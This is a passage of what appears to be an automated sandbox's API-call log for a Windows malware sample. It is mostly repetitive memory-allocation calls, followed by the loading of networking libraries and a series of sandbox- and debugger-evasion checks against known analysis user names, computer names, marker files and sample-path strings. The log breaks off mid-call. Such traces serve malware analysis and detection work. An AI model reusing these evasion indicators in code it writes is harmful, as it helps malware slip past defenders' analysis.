dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.274] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.275] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.276] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.277] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.278] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.279] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.280] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.281] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.282] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.283] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.430] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.436] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.454] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.454] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.454] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.454] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.454] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.454] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.454] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.616] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.616] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.616] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.616] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.616] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.616] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.616] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.616] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.617] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.617] GetUserNameA (in: lpBuffer=0x12fb5c, pcbBuffer=0x12f958 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x12f958) returned 1 [0050.620] GetComputerNameA (in: lpBuffer=0x12fa5c, nSize=0x12f958 | out: lpBuffer="F71GWAT", nSize=0x12f958) returned 1 [0050.620] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x12f95c, nSize=0x12f958 | out: lpBuffer="F71gwat", nSize=0x12f958) returned 1 [0050.620] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0050.622] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0050.622] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0050.622] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0050.622] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0050.622] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0050.622] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.622] CloseHandle (hObject=0xffffffff) returned 0 [0050.622] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.622] CloseHandle (hObject=0xffffffff) returned 0 [0050.622] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0050.622] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12fb68, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe")) returned 0x2e [0050.622] StrStrIA (lpFirst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpSrch="sample") returned 0x0 [0050.622] StrStrIA (lpFirst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpSrch="mlwr_smpl") returned 0x0 [0050.622] StrStrIA (lpFirst="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpSrch="artifact.exe") returned 0x0 [0050.622] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.622] IsDebuggerPresent () returned 0 [0050.622] IsDebuggerPresent () returned 0 [0050.622] IsDebuggerPresent () returned 0 [0050.622] IsDebuggerPresent () returned 0 [0050.622] IsDebuggerPresent () returned 0 [0050.622] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] VirtualAlloc 